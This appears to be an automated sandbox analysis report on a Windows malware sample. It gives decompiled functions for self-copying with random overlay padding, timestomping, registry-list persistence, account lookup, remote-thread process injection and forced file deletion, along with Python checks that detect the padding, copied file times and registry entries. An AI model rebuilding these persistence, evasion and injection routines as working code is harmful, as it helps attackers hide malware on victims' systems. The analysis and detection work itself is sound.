    						_t88 = CreateFileW(_t118 - 0x440, 0x80000000, 3, _t109, 3, _t109, _t109); // executed
    						_t116 = _t88;
    						if(_t116 != 0xffffffff) {
    							GetFileTime(_t116, _t118 - 0x20, _t118 - 0x30, _t118 - 0x28);
    							SetFileTime( *(_t118 - 8), _t118 - 0x20, _t118 - 0x30, _t118 - 0x28); // executed
    							FindCloseChangeNotification(_t116); // executed
    						}
    						CloseHandle( *(_t118 - 8));
    						goto L14;
    					}
    					_t101 = E004101D4(0x400, 0x40) << 9;
    					 *(_t118 - 0x10) = _t101;
    					if(_t101 == _t109) {
    						_t113 = 0;
    						__eflags = 0;
    					} else {
    						_t113 = E0040F0A8(_t101);
    						_t101 =  *(_t118 - 0x10);
    					}
    					if(_t113 == _t109) {
    						goto L11;
    					} else {
    						_t117 = 0;
    						if(_t101 <= _t109) {
    							L10:
    							_t110 = _t118 - 0x10;
    							WriteFile( *(_t118 - 8), _t113, _t101, _t118 - 0x10, _t109); // executed
    							FlushFileBuffers( *(_t118 - 8));
    							E0040F0C0(_t113);
    							goto L11;
    						} else {
    							goto L9;
    						}
    						do {
    							L9:
    							 *((char*)(_t117 + _t113)) = E004101D4(E004101D4(0xff, 1), _t109);
    							_t101 =  *(_t118 - 0x10);
    							_t117 = _t117 + 1;
    						} while (_t117 < _t101);
    						goto L10;
    					}
    				}
    			}

    APIs
    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,025DF908), ref: 004063F7
      • Part of subcall function 0040B770: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,00406408,?,025DF908), ref: 0040B791
    • PathCombineW.SHLWAPI(?,?,025DF7B0,?,025DF908), ref: 00406418
    • lstrcmpiW.KERNEL32(?,?,?,025DF908), ref: 0040642C
    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,025DF908), ref: 00406461
    • SetFileAttributesW.KERNELBASE(?,00000026,?,025DF908), ref: 00406470
    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000000,00000000,?,025DF908), ref: 00406489
    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,025DF908), ref: 004064A0
    • WriteFile.KERNELBASE(?,00000000,00000000,?,00000000,00000040,?,025DF908), ref: 004064FF
    • FlushFileBuffers.KERNEL32(?,?,025DF908), ref: 00406508
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000025,00000001,?,025DF908), ref: 00406520
    • PathCombineW.SHLWAPI(?,?,025DFB80,?,025DF908), ref: 00406536
    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,025DF908), ref: 0040654F
    • GetFileTime.KERNEL32(00000000,?,?,?,?,025DF908), ref: 00406569
    • SetFileTime.KERNELBASE(?,?,?,?,?,025DF908), ref: 0040657E
    • FindCloseChangeNotification.KERNELBASE(00000000,?,025DF908), ref: 00406585
    • CloseHandle.KERNEL32(?,?,025DF908), ref: 0040658E
    • SetFileAttributesW.KERNELBASE(?,00000021,?,025DF908), ref: 0040659D
    • Sleep.KERNELBASE(00000014,-00010331,00000000,025DF5A8,?,?,025DF908), ref: 004065F0
    • Sleep.KERNEL32(00000014,025DF8E0,-00010331,00000000,?,025DF908), ref: 0040660F
    • CloseHandle.KERNEL32(?), ref: 0040662F
    • ExitProcess.KERNEL32 ref: 0040663B
      • Part of subcall function 0040BC89: RegCreateKeyExW.KERNELBASE(80000002,025DFA18,00000000,00000000,00000000,00000003,00000000,?,00000000,?,?,00000000,025DF908), ref: 0040BCBB
      • Part of subcall function 0040BC89: RegQueryValueExW.KERNELBASE(?,025DF958,00000000,00000000,00000000,?,?,?,00000000,025DF908), ref: 0040BCDE
      • Part of subcall function 0040BC89: RegQueryValueExW.KERNELBASE(?,025DF958,00000000,00000000,00000000,?,?,?,00000000,025DF908), ref: 0040BD0F
      • Part of subcall function 0040BC89: StrCmpNIW.SHLWAPI(00000002,?,025DF908,?,?,00000000,025DF908), ref: 0040BD39
      • Part of subcall function 0040BC89: RegCloseKey.KERNELBASE(?,?,?,00000000,025DF908), ref: 0040BDBB
      • Part of subcall function 0040FFBF: SetFileAttributesW.KERNELBASE(?,00000020,00412063,?,?,?,00000000), ref: 0040FFC5
      • Part of subcall function 0040FFBF: DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 0040FFCF
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$ClosePath$AttributesCreate$CombineFolderHandleQuerySleepSpecialTimeValue$BuffersChangeCopyDeleteExitFindFlushModuleNameNotificationPointerProcessWritelstrcmpi
    • String ID:
    • API String ID: 39726543-0
    • Opcode ID: 3b2bdba17f1836de577f9c6bccdc1b1304bd904d466087f32d4689b458ad152d
    • Instruction ID: 58c9de0474e63ac647c2018957a64604130a9d5d51a627cdae8671de152b874c
    • Opcode Fuzzy Hash: 3b2bdba17f1836de577f9c6bccdc1b1304bd904d466087f32d4689b458ad152d
    • Instruction Fuzzy Hash: 435122B2900219BFDB10ABA0DC88EEE777CEB04304F054576F605F61A0DB799A958B69
    Uniqueness

    Uniqueness Score: -1.00%
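    The listing above leaves two artefacts on disk: the dropped copy carries a random block of 32 KiB to 512 KiB appended after the last section, and its file times are copied from a file in the system directory. The Python below is an added example, not code from the report or from the sample; it shows how to test a file for both: overlay bytes beyond the end of the last PE section with the size shape the sample produces, and access/modification times identical to a reference file. It assumes E004101D4(max, min) returns a random value between its two arguments (the fill loop at L9 suggests so), builds a constructed minimal PE in memory, and uses temporary files for the time check, so it runs offline; the file names and timestamps in demo() are constructed.

    ```python
    """Checks for the overlay padding and timestamp copying seen in the listing above (added example)."""
    import os
    import random
    import struct
    import tempfile
    from typing import Dict, Tuple

    SECTOR = 512                       # the sample's block size is a random count << 9


    def padding_range() -> Tuple[int, int]:
        """Size band of the appended block: E004101D4(0x400, 0x40) << 9, assuming the
        helper returns a value between its two arguments (inference from the listing)."""
        return 0x40 << 9, 0x400 << 9   # 32 KiB .. 512 KiB


    def overlay_size(data: bytes) -> int:
        """Bytes after the end of the last section, i.e. data no section header covers.
        Parses the standard PE headers; raises on a non-PE input."""
        if data[:2] != b"MZ":
            raise ValueError("not a PE image")
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            raise ValueError("missing PE signature")
        num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
        opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
        first = e_lfanew + 24 + opt_size          # first IMAGE_SECTION_HEADER
        end = first + 40 * num_sections           # headers alone never count as overlay
        for i in range(num_sections):
            raw_size, raw_ptr = struct.unpack_from("<II", data, first + 40 * i + 16)
            end = max(end, raw_ptr + raw_size)
        return max(0, len(data) - end)


    def looks_padded(data: bytes) -> bool:
        """True when the overlay has exactly the shape the sample produces: a multiple of
        512 bytes inside the 32 KiB .. 512 KiB band. Legitimate overlays (installer
        payloads, Authenticode signatures) usually fail at least one of the two tests."""
        lo, hi = padding_range()
        n = overlay_size(data)
        return lo <= n <= hi and n % SECTOR == 0


    def times_match(path_a: str, path_b: str) -> bool:
        """True when access and modification times agree to the nanosecond, which is
        what the GetFileTime/SetFileTime copy in the listing produces."""
        a, b = os.stat(path_a), os.stat(path_b)
        return (a.st_atime_ns, a.st_mtime_ns) == (b.st_atime_ns, b.st_mtime_ns)


    def build_pe(section: bytes, overlay: bytes) -> bytes:
        """Constructed minimal PE32: DOS header, one .text section at file offset 0x200."""
        opt_size, e_lfanew = 0xE0, 0x40
        dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
        file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x102)
        opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)
        sect = b".text\0\0\0" + struct.pack("<IIII", len(section), 0x1000, len(section), 0x200) + b"\0" * 16
        hdr = dos + b"PE\0\0" + file_hdr + opt + sect
        return hdr + b"\0" * (0x200 - len(hdr)) + section + overlay


    def demo() -> Dict[str, object]:
        """Constructed scenario: a reference file and a dropped copy that was padded and timestomped."""
        tmp = tempfile.mkdtemp()
        ref, drop = os.path.join(tmp, "reference.bin"), os.path.join(tmp, "dropped.exe")
        with open(ref, "wb") as f:
            f.write(b"reference file")
        os.utime(ref, ns=(1_500_000_000_000_000_000, 1_400_000_000_000_000_000))
        image = build_pe(b"\xC3" * 0x100, os.urandom(random.randint(0x40, 0x400) << 9))
        with open(drop, "wb") as f:
            f.write(image)
        st = os.stat(ref)
        os.utime(drop, ns=(st.st_atime_ns, st.st_mtime_ns))     # the SetFileTime step
        return {"overlay": overlay_size(image), "padded": looks_padded(image),
                "times_match": times_match(ref, drop)}
    ```

    On Windows the creation time is copied as well (GetFileTime hands back all three), but os.stat exposes it only on some platforms, so the check compares the two times available everywhere. The reference file to compare against is not known from the listing alone: its name comes from the sample's config, so on a real host compare the dropped file against the files in the system directory and flag any exact match.
    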

    C-Code - Quality: 98%
    			E0040BC89(WCHAR* _a4) {
    				// Registers the path in _a4 in a comma-separated REG_SZ list value under HKEY_LOCAL_MACHINE.
    				// Key and value names are read from the decrypted config block at 0x416c34 and are not
    				// visible here. Returns 1 when the path is already listed or was appended successfully.
    				// If the HKLM key cannot be opened (no admin rights), E004080D1 writes the value under
    				// HKEY_CURRENT_USER instead.
    				int _v8;
    				void* _v12;
    				int _v16;
    				intOrPtr _t45;
    				long _t46;
    				intOrPtr _t48;
    				intOrPtr _t52;
    				intOrPtr _t59;
    				signed int _t61;
    				intOrPtr _t71;
    				signed int _t72;
    				short _t74;
    				int _t76;
    				char* _t77;
    				WCHAR* _t82;
    				int _t84;
    				char* _t85;
    				signed int _t87;
    				signed int _t88;
    
    				_t76 = 0;
    				_t84 = E0040F533(_a4); // wide-string length of the path, in characters
    				_t45 =  *0x416c34; // 0x25df5a8
    				_t3 = _t45 + 0x3c; // 0x25dfa18 (subkey name)
    				_v16 = _t84;
    				_t46 = RegCreateKeyExW(0x80000002,  *_t3, 0, 0, 0, 3, 0,  &_v12, 0); // executed; HKLM, KEY_QUERY_VALUE | KEY_SET_VALUE
    				if(_t46 != 0) {
    					L18:
    					// fallback: same value name under HKCU (0x80000001), type 1 = REG_SZ, size in bytes including the terminator
    					_t39 = _t84 + 2; // 0x25df90a
    					_t48 =  *0x416c34; // 0x25df5a8
    					_t41 = _t48 + 0x44; // 0x25df958 (value name)
    					_t42 = _t48 + 0x40; // 0x25dfa90 (subkey name)
    					_t76 = E004080D1(0x80000001,  *_t42,  *_t41, 1, _a4, _t84 + _t39);
    				} else {
    					_t52 =  *0x416c34; // 0x25df5a8
    					_t6 = _t52 + 0x44; // 0x25df958 (value name)
    					_v8 = 0;
    					RegQueryValueExW(_v12,  *_t6, 0, 0, 0,  &_v8); // executed; size query only
    					_v8 = _v8 + 0xa + _t84 * 2; // existing data + ",<path>," + terminator
    					_t85 = E0040F0A8(_v8 + 0xa + _t84 * 2);
    					if(_t85 != 0) {
    						_t59 =  *0x416c34; // 0x25df5a8
    						_t15 = _t59 + 0x44; // 0x25df958
    						RegQueryValueExW(_v12,  *_t15, 0, 0, _t85,  &_v8); // executed; read the current list
    						_t77 = _t85; // scan cursor
    						_t82 = _t85; // start of the current entry
    						while(1) {
    							_t61 =  *_t77 & 0x0000ffff;
    							if(_t61 == 0 || _t61 == 0x2c) { // end of string or ',' closes an entry
    								goto L5;
    							}
    							L8:
    							if( *_t77 == 0) {
    								// path not present: append ",<path>," (the leading ',' only if the value does not already end in one)
    								_t87 = E0040F533(_t85);
    								if(_t87 > 0 && _t85[_t87 * 2 - 2] != 0x2c) {
    									_t74 = 0x2c;
    									 *(_t85 + _t87 * 2) = _t74;
    									_t87 = _t87 + 1;
    								}
    								lstrcpyW(_t85 + _t87 * 2, _a4);
    								_t88 = _t87 + _v16;
    								lstrcpyW(_t85 + _t88 * 2, ",");
    								_t33 = _t88 + 4; // 0x25df90c
    								_t71 =  *0x416c34; // 0x25df5a8
    								_t34 = _t71 + 0x44; // 0x25df958
    								_t72 = RegSetValueExW(_v12,  *_t34, 0, 1, _t85, _t88 + _t33); // executed; REG_SZ, (chars + 1) * 2 + 2 bytes
    								asm("sbb bl, bl");
    								_t76 =  ~_t72 + 1; // neg/sbb/inc idiom: 1 if RegSetValueExW returned ERROR_SUCCESS, else 0
    							} else {
    								_t77 =  &(_t77[2]); // next wide character
    								continue;
    							}
    							L15:
    							E0040F0C0(_t85); // heap free
    							goto L16;
    							L5:
    							// entry complete: it matches only with the same length and a case-insensitive compare of that length
    							if(_t77 - _t82 >> 1 != _v16 || StrCmpNIW(_t82, _a4, _v16) != 0) {
    								_t20 =  &(_t77[2]); // 0x4; skip the ',' and start the next entry
    								_t82 = _t20;
    								goto L8;
    							} else {
    								_t76 = 1; // already registered, nothing written
    							}
    							goto L15;
    						}
    					}
    					L16:
    					RegCloseKey(_v12); // executed
    					if(_t76 == 0) {
    						_t84 = _v16;
    						goto L18; // nothing registered under HKLM: try HKCU
    					}
    				}
    				return _t76;
    			}

    Instruction addresses
    • One entry per statement line of the listing above, in the same order; 0x00000000 marks a line to which the decompiler attributed no address.
    0x0040bc95
    0x0040bc9f
    0x0040bca5
    0x0040bcb0
    0x0040bcb3
    0x0040bcbb
    0x0040bcc3
    0x0040bdc8
    0x0040bdc8
    0x0040bdd0
    0x0040bdd7
    0x0040bdda
    0x0040bde7
    0x0040bcc9
    0x0040bccd
    0x0040bcd5
    0x0040bcd8
    0x0040bcde
    0x0040bceb
    0x0040bcf3
    0x0040bcf7
    0x0040bd01
    0x0040bd09
    0x0040bd0f
    0x0040bd15
    0x0040bd17
    0x0040bd19
    0x0040bd19
    0x0040bd1f
    0x00000000
    0x00000000
    0x0040bd46
    0x0040bd49
    0x0040bd5a
    0x0040bd5e
    0x0040bd6a
    0x0040bd6b
    0x0040bd6f
    0x0040bd6f
    0x0040bd77
    0x0040bd7d
    0x0040bd89
    0x0040bd8f
    0x0040bd94
    0x0040bd9e
    0x0040bda4
    0x0040bdae
    0x0040bdb0
    0x0040bd4b
    0x0040bd4c
    0x00000000
    0x0040bd4c
    0x0040bdb2
    0x0040bdb3
    0x00000000
    0x0040bd27
    0x0040bd30
    0x0040bd43
    0x0040bd43
    0x00000000
    0x0040bd4f
    0x0040bd4f
    0x0040bd4f
    0x00000000
    0x0040bd30
    0x0040bd19
    0x0040bdb8
    0x0040bdbb
    0x0040bdc3
    0x0040bdc5
    0x00000000
    0x0040bdc5
    0x0040bdc3
    0x0040bdef

    APIs
    • RegCreateKeyExW.KERNELBASE(80000002,025DFA18,00000000,00000000,00000000,00000003,00000000,?,00000000,?,?,00000000,025DF908), ref: 0040BCBB
    • RegQueryValueExW.KERNELBASE(?,025DF958,00000000,00000000,00000000,?,?,?,00000000,025DF908), ref: 0040BCDE
    • RegQueryValueExW.KERNELBASE(?,025DF958,00000000,00000000,00000000,?,?,?,00000000,025DF908), ref: 0040BD0F
    • StrCmpNIW.SHLWAPI(00000002,?,025DF908,?,?,00000000,025DF908), ref: 0040BD39
    • lstrcpyW.KERNEL32(00000000,?), ref: 0040BD77
    • lstrcpyW.KERNEL32(00000000,00403EAC), ref: 0040BD89
    • RegSetValueExW.KERNELBASE(?,025DF958,00000000,00000001,00000000,025DF90C,?,?,00000000,025DF908), ref: 0040BDA4
    • RegCloseKey.KERNELBASE(?,?,?,00000000,025DF908), ref: 0040BDBB
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Value$Querylstrcpy$CloseCreate
    • String ID:
    • API String ID: 4198832413-0
    • Opcode ID: c4d87d311685b49f4018c65c507b35c64de22a62e77cda0dec196119e552dbc7
    • Instruction ID: a5422d6f9c219361bdf7a6993a30ffce1b38900c95991cebce53dd78938a67d6
    • Opcode Fuzzy Hash: c4d87d311685b49f4018c65c507b35c64de22a62e77cda0dec196119e552dbc7
    • Instruction Fuzzy Hash: C3419936602108FBCB209BA9CD48EEEBFB9EF05344B018026F545A72A0E735D911CBD8
    Uniqueness

    Uniqueness Score: -1.00%
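    E0040BC89 above treats the value as a comma-separated string: it walks the entries, accepts an entry as a match only when it has exactly the path's length and compares equal case-insensitively, and otherwise appends the path followed by a trailing comma, inserting a separating comma only when the value does not already end with one. The Python below is an added example, not code from the report or from the sample; it re-implements that string logic so a detection rule for such a value can be exercised offline, and adds an allow-list check over the entries. The key and value names live in the sample's encrypted config and are not on this page; the paths in the sample data are constructed.

    ```python
    """Model of the comma-separated list handling in E0040BC89 (added example)."""
    from typing import Dict, List, Set, Tuple


    def entries(value: str) -> List[str]:
        """Split the REG_SZ data the way the sample scans it: ',' ends an entry and the
        terminating NUL ends the last one, so a trailing ',' yields an empty tail."""
        return value.split(",")


    def already_listed(value: str, path: str) -> bool:
        """Mirror of label L5: an entry matches only if its length equals the path's
        length (the '>> 1' check) and StrCmpNIW reports equality (case-insensitive)."""
        return any(len(e) == len(path) and e.lower() == path.lower() for e in entries(value))


    def register(value: str, path: str) -> Tuple[str, bool]:
        """Mirror of label L8 through RegSetValueExW.

        Returns (new_value, written). When the path is absent the sample appends a
        ',' unless the value already ends with one, then the path, then another ','.
        """
        if already_listed(value, path):
            return value, False          # _t76 = 1 without touching the value
        out = value
        if out and not out.endswith(","):
            out += ","
        return out + path + ",", True


    def suspicious_entries(value: str, allowed: Set[str]) -> List[str]:
        """Detection helper: non-empty entries that are not on the allow-list.
        Comparison is case-insensitive and ignores surrounding quotes and blanks,
        since an operator's allow-list may be written either way."""
        norm = {a.strip().strip('"').lower() for a in allowed}
        return [e for e in entries(value) if e.strip() and e.strip().strip('"').lower() not in norm]


    # Constructed sample data (not taken from the analysed machine).
    BASELINE = "C:\\Windows\\system32\\first.exe"
    DROPPED = "C:\\Users\\u\\AppData\\Roaming\\dropped.exe"


    def demo() -> Dict[str, object]:
        """Run the model on the constructed data: register once, re-register with
        different case (must be a no-op), then audit the resulting value."""
        value, written = register(BASELINE, DROPPED)
        _, written_again = register(value, DROPPED.upper())
        return {
            "value": value,
            "written": written,
            "written_again": written_again,
            "suspicious": suspicious_entries(value, {BASELINE}),
        }
    ```

    Two details matter for a detector: a prefix of the path never matches (the length check rules it out), so a partially renamed entry would be appended again, and every value the sample has touched ends with a comma, which is a cheap first filter before the allow-list comparison.
    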

    C-Code - Quality: 100%
    			E0040C0AE(long _a4, union _SID_NAME_USE _a8) {
    				// Resolves the account name of the user whose token is attached to the process handle _a4
    				// and writes it to the caller's buffer _a8 (up to 0x103 characters). Returns 1 on success.
    				void* _v8;
    				short _v528;
    				int _t26;
    				int _t32;
    				union _TOKEN_INFORMATION_CLASS _t33;
    				void* _t35;
    
    				_t33 = 0;
    				if(OpenProcessToken(_a4, 8,  &_v8) != 0) { // TOKEN_QUERY
    					_a4 = 0;
    					GetTokenInformation(_v8, 1, 0, 0,  &_a4); // executed; class 1 = TokenUser, size query
    					_t35 = E0040F0A8(_a4); // heap-allocate the TOKEN_USER structure
    					if(_t35 != 0) {
    						_t26 = GetTokenInformation(_v8, 1, _t35, _a4,  &_a4); // executed; TokenUser
    						if(_t26 != 0) {
    							_a4 = 0x103; // buffer sizes in characters (the decompiler reuses _a4 for both)
    							// SID at the start of TOKEN_USER -> account name into _a8; the domain goes to _v528 and is discarded
    							_t32 = LookupAccountSidW(0,  *_t35, _a8,  &_a4,  &_v528,  &_a4,  &_a8); // executed
    							if(_t32 != 0) {
    								_t33 = 1;
    							}
    						}
    						E0040F0C0(_t35); // heap free
    					}
    					FindCloseChangeNotification(_v8); // executed; closes the token handle (alias of CloseHandle in kernelbase, resolved by address)
    				}
    				return _t33;
    			}

    Instruction addresses
    • One entry per statement line of the listing above, in the same order; 0x00000000 marks a line to which the decompiler attributed no address.
    0x0040c0c1
    0x0040c0cb
    0x0040c0d9
    0x0040c0dc
    0x0040c0ea
    0x0040c0ee
    0x0040c0fd
    0x0040c105
    0x0040c11d
    0x0040c127
    0x0040c12f
    0x0040c131
    0x0040c131
    0x0040c12f
    0x0040c134
    0x0040c134
    0x0040c13c
    0x0040c142
    0x0040c147

    APIs
    • OpenProcessToken.ADVAPI32(?,00000008,00000000,00000000), ref: 0040C0C3
    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenUser),00000000,00000000,?,00000000), ref: 0040C0DC
    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenUser),00000000,?,?), ref: 0040C0FD
    • LookupAccountSidW.ADVAPI32(00000000,00000000,?,?,?,?,?), ref: 0040C127
    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040C13C
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Token$Information$AccountChangeCloseFindLookupNotificationOpenProcess
    • String ID:
    • API String ID: 3997156143-0
    • Opcode ID: 547ba595d7f5ae1344f96a63ebfdd81f1779ce76bb93c90b3e0184ac1e63cff6
    • Instruction ID: 2c770b5bcf42df034fa1a8b007eb2797cd411f31980d83029c068bbb394a3dd9
    • Opcode Fuzzy Hash: 547ba595d7f5ae1344f96a63ebfdd81f1779ce76bb93c90b3e0184ac1e63cff6
    • Instruction Fuzzy Hash: 19110A76500108FFDB119FA0DC85EDE7BBCEF08340F118136B955AA191EB75DB449BA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00407873(void* __eax, void* __ecx, intOrPtr _a4, long _a8) {
    				// Remote-thread injection primitive. Takes either an open process handle in eax or a PID in _a8.
    				// E004070D3 places the payload in the target (the report's signature "Injects a PE file into a
    				// foreign processes" covers this) and returns its base address there; a thread is then started
    				// at base + _a4. _v5 records whether the handle belongs to the caller (then it is not closed
    				// here); _v6 is the result.
    				char _v5;
    				char _v6;
    				void* _t11;
    				intOrPtr _t12;
    				void* _t23;
    
    				_t23 = __eax;
    				_v5 = 1;
    				_v6 = 0;
    				if(__eax != 0) {
    					L4:
    					_t11 = E004070D3(_t23); // executed; payload base inside the target, 0 on failure
    					if(_t11 != 0 && RtlCreateUserThread(_t23, 0, 0, 0, 0, 0, _t11 + _a4, 0, 0, 0) == 0) { // ntdll: no security descriptor, not suspended, default stack, no argument
    						_v6 = 1; // thread created
    					}
    					if(_v5 == 0) {
    						FindCloseChangeNotification(_t23); // executed; closes the handle opened below (alias of CloseHandle in kernelbase, resolved by address)
    					}
    					_t12 = _v6;
    				} else {
    					_v5 = 0;
    					if(_a8 == 0) {
    						L3:
    						_t12 = 0;
    					} else {
    						// 0x43a = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION
    						_t23 = OpenProcess(0x43a, 0, _a8);
    						if(_t23 != 0) {
    							goto L4;
    						} else {
    							goto L3;
    						}
    					}
    				}
    				return _t12;
    			}

    Instruction addresses
    • One entry per statement line of the listing above, in the same order; 0x00000000 marks a line to which the decompiler attributed no address.
    0x0040787b
    0x0040787d
    0x00407881
    0x00407886
    0x004078a9
    0x004078aa
    0x004078b1
    0x004078cc
    0x004078cc
    0x004078d3
    0x004078d6
    0x004078d6
    0x004078dc
    0x00407888
    0x00407888
    0x0040788e
    0x004078a5
    0x004078a5
    0x00407890
    0x0040789f
    0x004078a3
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004078a3
    0x0040788e
    0x004078e2

    APIs
    • OpenProcess.KERNEL32(0000043A,00000000,025DF908,00406A53,00000000,?,?,00406607,-00010331,00000000,025DF5A8,?,?,025DF908), ref: 00407899
    • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004078C2
    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,00406A53,00000000,?,?,00406607,-00010331,00000000,025DF5A8,?,?,025DF908), ref: 004078D6
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: ChangeCloseCreateFindNotificationOpenProcessThreadUser
    • String ID:
    • API String ID: 307445780-0
    • Opcode ID: c86bd27e8ad329dc283702f3ffc95cb9e5faea08e09f1f93ddcadd778adff7a7
    • Instruction ID: 614c3d17bb4526638088b8f68b84235134837efb421a8ce1df2c31fa13115014
    • Opcode Fuzzy Hash: c86bd27e8ad329dc283702f3ffc95cb9e5faea08e09f1f93ddcadd778adff7a7
    • Instruction Fuzzy Hash: 0D018472C08258BEEB116AA49C89AEF7B6C9F11348F05C0B9E941A2241D17D6D45C37A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040FFBF(WCHAR* _a4) {
    				// Force-deletes a file: clears read-only/hidden/system bits first (FILE_ATTRIBUTE_NORMAL = 0x20).
    				// Returns 1 if DeleteFileW succeeded; the masked expression is the decompiler's view of "setne al".
    				signed int _t6;
    
    				SetFileAttributesW(_a4, 0x20); // executed
    				_t6 = DeleteFileW(_a4); // executed
    				return _t6 & 0xffffff00 | _t6 != 0x00000000;
    			}

    Instruction addresses
    • One entry per statement line of the listing above, in the same order.
    0x0040ffc5
    0x0040ffcf
    0x0040ffda

    APIs
    • SetFileAttributesW.KERNELBASE(?,00000020,00412063,?,?,?,00000000), ref: 0040FFC5
    • DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 0040FFCF
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$AttributesDelete
    • String ID:
    • API String ID: 2910425767-0
    • Opcode ID: 188b0b2285212e089f1c6df4997939e57e3c566c9ae95ea81ba26c042997fdfe
    • Instruction ID: 6102b86d210efc87d492dd320c079734b7a4812bf1cfcb85b982540be8ecba46
    • Opcode Fuzzy Hash: 188b0b2285212e089f1c6df4997939e57e3c566c9ae95ea81ba26c042997fdfe
    • Instruction Fuzzy Hash: C1C04835204302ABD7011B21EE0AB4EBAAABF94B41F06C438B245840B0CB72C861EB09
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000), ref: 005400A6
    Memory Dump Source
    • Source File: 00000000.00000002.464199377.0000000000540000.00000040.00000001.sdmp, Offset: 00540000, based on PE: false
    Similarity
    • API ID: ProtectVirtual
    • String ID:
    • API String ID: 544645111-0
    • Opcode ID: cbb4c135d4accfbbd946fa11c72b1a573c117da781d7f52a71e901d1aeb879dd
    • Instruction ID: 1b8c5f3e7670d232112edfc0dbb9e4e6c2932ecfb056d3f39dc75c26cb3557ba
    • Opcode Fuzzy Hash: cbb4c135d4accfbbd946fa11c72b1a573c117da781d7f52a71e901d1aeb879dd
    • Instruction Fuzzy Hash: A32136729051414BE7116B38CC483AABF95BFD9358F79A87DEA8997382C9388C41C751
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000), ref: 005400A6
    Memory Dump Source
    • Source File: 00000000.00000002.464199377.0000000000540000.00000040.00000001.sdmp, Offset: 00540000, based on PE: false
    Similarity
    • API ID: ProtectVirtual
    • String ID:
    • API String ID: 544645111-0
    • Opcode ID: 961b601bbcab4acc5f1402820899e9ddaaca4764baa0798e72b16e56d5829718
    • Instruction ID: f4c75b828f0f4b5f0d57097adb348b87595a5ec3befc7ff1f2103dc949eeb7d1
    • Opcode Fuzzy Hash: 961b601bbcab4acc5f1402820899e9ddaaca4764baa0798e72b16e56d5829718
    • Instruction Fuzzy Hash: 641108725042019BD714BB34CC993AEBF95FFC4328F34B82DE68A97282C6359C81C722
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,00406408,?,025DF908), ref: 0040B791
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: FolderPathSpecial
    • String ID:
    • API String ID: 994120019-0
    • Opcode ID: f84f60d26b8364099bcbd9f8da7c01a56791068e8f52c201820c4be0d64056b5
    • Instruction ID: c2c969ffa5e6bafc982bb85cbc9a2a83be5ca33ced2668a8fb6549a180254f0d
    • Opcode Fuzzy Hash: f84f60d26b8364099bcbd9f8da7c01a56791068e8f52c201820c4be0d64056b5
    • Instruction Fuzzy Hash: A7D0C9B16245105AFA0C4B24DD6ABB52264DB14761F16431CB657CA1E0EA9128409668
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040F0A8(void* __eax) {
    				// Heap allocation wrapper used throughout the sample: size in eax, returns a zeroed block of
    				// size + 4 bytes from the heap handle stored at 0x418074 (flag 8 = HEAP_ZERO_MEMORY), or 0 for
    				// a zero-size request. E0040F0C0 is the matching free.
    				void* _t3;
    
    				if(__eax != 0) {
    					_t3 = RtlAllocateHeap( *0x418074, 8, __eax + 4); // executed
    					return _t3;
    				} else {
    					return __eax;
    				}
    			}

    Instruction addresses
    • One entry per statement line of the listing above, in the same order.
    0x0040f0aa
    0x0040f0b9
    0x0040f0bf
    0x0040f0ac
    0x0040f0ac
    0x0040f0ac

    APIs
    • RtlAllocateHeap.NTDLL(00000008,00000180,0040B604), ref: 0040F0B9
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: ca8ecb18dd3d27c67d3f44fffbc5821475682f9e305b00bf990f41ff915d08d2
